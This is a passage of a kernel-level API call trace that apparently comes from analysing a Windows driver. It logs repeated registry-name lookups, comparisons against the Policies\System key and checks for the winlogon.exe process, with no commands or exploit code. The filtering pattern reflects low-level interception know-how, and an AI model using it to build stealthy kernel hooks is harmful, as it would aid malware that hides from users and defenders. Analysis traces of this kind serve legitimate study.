| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xae, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xac, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0xac, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fb7760, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fb7760, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9a, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fb7760, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fb7760, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x98, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fb7760, Length = 0x98, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fb7760, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fb7760, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9a, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fb7760, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fb7760, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x98, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fb7760, Length = 0x98, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
